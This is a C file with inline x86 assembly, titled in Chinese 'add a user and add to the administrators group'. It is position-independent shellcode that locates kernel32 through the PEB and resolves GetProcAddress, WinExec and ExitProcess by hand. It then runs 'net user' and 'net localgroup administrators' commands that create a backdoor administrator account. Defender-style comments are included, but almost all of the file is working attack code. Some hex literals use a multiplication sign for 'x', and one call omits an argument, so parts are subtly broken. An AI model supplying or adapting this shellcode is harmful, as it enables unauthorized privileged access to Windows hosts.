添加一个用户并加至管理员组


#include <windows.h>

/*
 * main - 32-bit MSVC inline-assembly demonstration stub.
 *
 * What the listing does (all of it is visible below):
 *   1. Reads the PEB from the TEB (fs:[30h]), follows PEB.Ldr and the
 *      loader's initialization-order module list, and takes the DllBase of
 *      the second entry as the kernel32.dll image base.
 *   2. Walks kernel32's export directory by name, compares the first eight
 *      bytes of each name against "GetProcA", and resolves that export's
 *      address through the ordinal and function tables.
 *   3. Uses GetProcAddress to resolve WinExec and ExitProcess, builds two
 *      "net ..." command strings on the stack (see the per-line ASCII
 *      comments), runs them with WinExec, then calls ExitProcess.
 *
 * Reader notes (analysis / defender perspective):
 *   - Every structure offset is hard-coded for 32-bit Windows, and the
 *     module walk assumes kernel32 is the second module in initialization
 *     order; on other Windows releases a different module may sit there,
 *     so the edi value is an assumption, not a guarantee.
 *   - The export-name scan has no lower-bound check: ecx is decremented
 *     until a match, so a missing match walks past the table.
 *   - Only an eight-byte prefix ("GetProcA") is compared, so any other
 *     export beginning with those bytes would also be accepted.
 *   - The routine never returns: ExitProcess is the last call, so the
 *     clobbered callee-saved registers (ebx, esi, edi) and the overwritten
 *     saved ebp (see [ebp+40h]) are never seen by the caller.
 *   - On a host, the effects of these commands are recorded by Windows
 *     Security auditing (account creation: event ID 4720; member added to a
 *     local group: event ID 4732) and appear as child processes spawned
 *     via WinExec from this executable.
 */
int main()
{
__asm{
; Register / slot roles (Intel syntax, MSVC __asm):
;   edi       = kernel32.dll image base (assumed, see header note)
;   edx       = VA of kernel32's IMAGE_EXPORT_DIRECTORY
;   ebx       = scratch table pointer (names / ordinals / functions)
;   ecx       = export index under test, later the resolved ordinal
;   [ebp+40h] = GetProcAddress   [ebp+8h] = WinExec   [ebp+12h] = ExitProcess
push ebp ;save caller frame pointer (this slot is overwritten later, see [ebp+40h])
sub esp, 0×40; reserve a scratch area for the resolved addresses
mov ebp, esp; ebp = base of the scratch area

push ebp ;second copy of ebp; not read again in this block
mov eax, fs:0×30 ;eax = PEB (TEB.ProcessEnvironmentBlock)
mov eax, [eax+0×0c] ;eax = PEB.Ldr (PEB_LDR_DATA)
mov esi, [eax+0×1c] ;esi = Ldr.InInitializationOrderModuleList.Flink (first entry)
lodsd ;eax = Flink of that entry -> second module in initialization order
mov edi, [eax+0×08] ;edi = entry's DllBase; assumed to be kernel32.dll

mov eax, [edi+3Ch] ;eax = e_lfanew (RVA of the PE header)
mov edx, [edi+eax+78h] ;edx = export directory RVA (DataDirectory[0].VirtualAddress)
add edx, edi ;edx = export directory VA
mov ecx, [edx+18h] ;ecx = NumberOfNames (loop bound for the name scan)
mov ebx, [edx+20h] ;ebx = AddressOfNames RVA
add ebx, edi ;ebx = AddressOfNames VA

search:
;scan the name table from the last entry downwards (no lower-bound check)
dec ecx ;ecx = next name index to test
mov esi, [ebx+ecx*4] ;esi = RVA of the ecx-th export name
add esi, edi ;esi = VA of that name string
;looking for GetProcAddress by its first eight bytes
mov eax, 0×50746547
cmp [esi], eax ;little-endian dword of "GetP"
jne search
mov eax, 0×41636f72
cmp [esi+4], eax ;little-endian dword of "rocA"
jne search

;name starts with "GetProcA": treat it as GetProcAddress
mov ebx, [edx+24h]
add ebx, edi ;ebx = AddressOfNameOrdinals VA
mov cx, [ebx+ecx*2] ;cx = ordinal for this name (upper half of ecx is left as-is)
mov ebx, [edx+1Ch]
add ebx, edi ;ebx = AddressOfFunctions VA
mov eax, [ebx+ecx*4] ;eax = RVA of the function at that ordinal
add eax, edi ;eax = VA of GetProcAddress

mov [ebp+40h], eax ;stash GetProcAddress; this is the saved-ebp slot pushed at entry

push dword ptr 0×00636578 ;"xec\0" - build "WinExec\0" on the stack
push dword ptr 0×456e6957 ;"WinE"
push esp ;lpProcName = the string just built
push edi ;hModule = kernel32 base
call [ebp+40h] ;GetProcAddress(kernel32, "WinExec")
mov [ebp+8h], eax ;[ebp+8h] = WinExec

push dword ptr 0×00737365 ;"ses\0" - build "ExitProcess\0" on the stack
push dword ptr 0×636f7250 ;"Proc"
push dword ptr 0×74697845 ;"Exit"
push esp ;lpProcName
push edi ;hModule = kernel32 base
call [ebp+40h] ;GetProcAddress(kernel32, "ExitProcess")
mov [ebp+12h], eax ;[ebp+12h] = ExitProcess

;first command string, built in 4-byte chunks (two zero dwords terminate it)
push 0
push dword ptr 0
push dword ptr 0×6464612f ;/add
push dword ptr 0×20696661 ;afi
push dword ptr 0×6c616873 ;shal
push dword ptr 0×63736920 ; isc
push dword ptr 0×6966616c ;lafi
push dword ptr 0×61687320 ; sha
push dword ptr 0×72657375 ;user
push dword ptr 0×2074656e ;net
push esp ;lpCmdLine = start of the string
call [ebp+8h] ;WinExec(lpCmdLine, uCmdShow); no uCmdShow is pushed, so it appears to be read from the next stack dword (the first four bytes of the string)

;second command string, same construction (one zero dword; "dd" chunk carries two NULs)
push 0
push dword ptr 0×00006464 ;dd
push dword ptr 0×612f2069 ;i /a
push dword ptr 0×66616c61 ;alaf
push dword ptr 0×68732073 ;s sh
push dword ptr 0×726f7461 ;ator
push dword ptr 0×72747369 ;istr
push dword ptr 0×6e696d64 ;dmin
push dword ptr 0×61207075 ;up a
push dword ptr 0×6f72676c ;lgro
push dword ptr 0×61636f6c ;loca
push dword ptr 0×2074656e ;net
push esp ;lpCmdLine
call [ebp+8h] ;WinExec, same argument note as above

push 0 ;uExitCode = 0
call [ebp+12h] ;ExitProcess(0) - does not return
}
return 0; /* unreachable: ExitProcess above terminates the process */
}